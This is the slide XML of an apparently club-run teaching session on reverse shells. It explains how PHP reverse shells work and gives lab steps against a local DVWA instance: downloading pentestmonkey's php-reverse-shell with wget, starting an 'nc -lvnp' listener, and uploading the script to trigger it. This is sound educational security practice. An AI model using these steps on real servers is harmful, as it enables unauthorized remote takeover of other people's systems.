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" roundtripDataSignature="AMtx7mhAIXycPc7xwbcYKCpifzUxTb1F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customschemas.google.com/relationships/presentationmetadata" Target="metadata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6b3f2498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66b3f2498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g166b3f2498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db78a74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6db78a74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Reverse shells take advantage of vulnerabilities on the target computer to start a shell session that they can use to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>victim's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> computer. Goal is to connect to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>victim's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> computer remotely &amp; gain full control by upgrading your shells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> as you go. This is a huge security threat &amp; is often used in penetration tests.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;g16db78a742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db78a742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6db78a742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PHP reverse shells are used in situations where you have upload access to a web-server that is running PHP. They center around you being able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> your own PHP script &amp; the load the webpage that the script would be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>associated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> with using your browser.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It is common for the scripts to open an outbound TCP connection from the web-server from a port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>specified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> within the script. The using a listener on your computer you can pick up the outgoing signal &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> to the victim. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;g16db78a742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fa82965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6fa82965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Google Shape;224;g16fa82965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00" cy="6465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b="0" l="12814" r="24060" t="0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b="0" l="14408" r="14399" t="0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Announcements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536600" y="1690750"/>
            <a:ext cx="9118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week is our last free session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CTF Club has been voted for wednesday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details once we have a pub and time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66b3f2498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6b3f2498c_1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166b3f2498c_1_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2414450" y="1363250"/>
            <a:ext cx="6675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Soar Point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Firebug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Oddbar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166b3f2498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388" y="4701450"/>
            <a:ext cx="52292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66b3f2498c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875" y="143350"/>
            <a:ext cx="2470325" cy="24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66b3f2498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1175" y="733150"/>
            <a:ext cx="2797151" cy="27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6db78a74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6db78a742c_0_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Shells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g16db78a742c_0_6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shells (also known as remote shell or connect-back shell) uses vulnerabilities located on the target system to start a shell that allows you to access the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victim's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computer.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a method commonly used in penetration tests to get a complete takeover of the target machine.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6db78a742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6db78a742c_0_1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PHP </a:t>
            </a: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Reverse Shells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g16db78a742c_0_13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536600" y="16907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shells specifically are a common exploit in web apps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center around being able to upload or inject your own php file into a web server and then access the upload location, causing it to run.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can be used to execute many server side commands, but one of the most powerful is a shell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6fa82965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6fa82965e0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b="0" i="0" sz="4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g16fa82965e0_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475225" y="1812750"/>
            <a:ext cx="5250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dvwa-start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with admin/password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Scroll down and click create/reset database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admin/password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DVWA security tab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low click submit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file upload tab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a terminal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wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php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6fa82965e0_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5994325" y="1812750"/>
            <a:ext cx="496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nc -lvnp 1234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back to DVWA (firefox) and click browse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and select “php-reverse-shell.php”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upload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Navigate to 127.0.0.1:42001/hackable/uploads/php-reverse-shell.php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Reopen terminal and have fun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